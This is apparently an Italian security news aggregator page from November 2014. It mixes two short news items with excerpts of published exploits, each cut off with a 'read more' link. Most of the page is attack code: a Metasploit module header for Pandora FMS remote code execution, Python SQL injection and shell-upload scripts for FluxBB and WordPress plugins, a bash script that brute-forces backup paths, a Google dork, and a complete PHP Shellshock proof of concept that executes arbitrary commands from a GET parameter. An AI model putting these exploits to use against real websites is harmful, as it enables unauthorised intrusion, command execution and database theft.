Siti di tutto il mondo sotto attacco hacker, c’è anche Repubblica.it

27 novembre 2014 - Fonte: http://www.mondounix.com

repubblica xss hack hacking

Repubblica.it e i siti dei quotidiani locali del Gruppo Espresso sono stati oggetto di un attacco hacker indiretto, attraverso parti di codice di Gigya, una società statunitense che fornisce le funzioni di commento dei lettori in tutto il mondo.
Gigya probabilmente è stata presa di mira perché ha sedi anche in Israele.
L'attacco è avvenuto attraverso i DNS della società ovvero ridirezionando gli accessi degli utenti verso un computer controllato dagli hacker.

L'attacco ha riguardato molti siti in tutto il mondo.
Anche il sito del quotidiano britannico The Independent è stato attaccato come quelli...

Leggi il seguito »

Apadana CMS SQL Injection

26 novembre 2014 - Fonte: http://www.mondounix.com
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] Exploit Title : Apadana CMS Sql Injection Vulnerability
[0] Exploit Author : SeRaVo.BlackHat
[0] Vendor Homepage : http://www.apadanacms.ir/
[0] Google Dork : powered by apadana CMS
[0] Date: 2014/November/25
[0] Tested On : windows + linux | Mozila | Havij
[0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0]     ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]     :::       Apadana CMS Sql Injection Vulnerability    :::
[0]     ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]...

Leggi il seguito »

Pandora FMS SQL Injection Remote Code Execution

26 novembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Pandora FMS SQLi Remote Code Execution',
      'Description'    => %q{
        This module attempts to exploit multiple issues in order to gain remote
        code execution under Pandora FMS version <= 5.0 SP2.  First, an attempt
        to authenticate using default credentials is performed.  If this method
...

Leggi il seguito »

WordPress Html5 Mp3 Player Full Path Disclosure

26 novembre 2014 - Fonte: http://www.mondounix.com
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz :  Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
              DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/...

Leggi il seguito »

FluxBB 1.5.6 SQL Injection

26 novembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
 
url  = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd  = 'test' 
 
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
 
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'
 
def stage1(sql):
  if len(sql) > 80:
    sys.exit('SQL too long, max 80 chars')
  print "1st stage: %s (%d chars)" % (sql, len(sql))
  r = urlopen(Request('%sprofile.php?action=change_email&id=%s'...

Leggi il seguito »

WordPress wpDataTables 1.5.3 Shell Upload

26 novembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file'...

Leggi il seguito »

WordPress wpDataTables 1.5.3 SQL Injection

26 novembre 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani 
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
######################
 
# Description
 
Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
 
"table_id" variable is not sanitized.
 
File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable',...

Leggi il seguito »

WordPress WP-DB-Backup 2.2.4 Backup Theft

26 novembre 2014 - Fonte: http://www.mondounix.com
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
 
DATE="20141031"; #Date to search
 
if [ ! -e rainbow ]; then
 
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16]...

Leggi il seguito »

PHP 5.x / Bash Shellshock Proof Of Concept

26 novembre 2014 - Fonte: http://www.mondounix.com
<?php
 
// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
// Date: 22/11/2014
// Exploit Author: ssbostan
// Vendor Homepage: http://www.gnu.org/software/bash/
// Software Link: http://ftp.gnu.org/gnu/bash/
// Version: <= 4.3
// Tested on: Fedora 17, Ubuntu 8.04
// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/
 
if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
{
  $file=tempnam("/tmp", "xpl");
  putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
  mail("xpl@localhost", "", "", "", "-bv");
  echo file_get_contents($file);
  unlink($file);
}
 
?>

(6)

...

Leggi il seguito »

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

24 novembre 2014 - Fonte: http://www.mondounix.com

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

It was the spring of 2011 when the European Commission discovered it had been hacked. The intrusion into the EU’s legislative body was sophisticated and widespread and used a zero-day exploit to get in. Once the attackers established a stronghold on the network, they were in for the long haul. They scouted the network architecture for additional victims and covered their tracks well. Eventually, they infected numerous systems belonging to the European Commission and the European Council before being discovered.

Two years later another big target was hacked. This time it was Belgacom, the partly state-owned Belgian...

Leggi il seguito »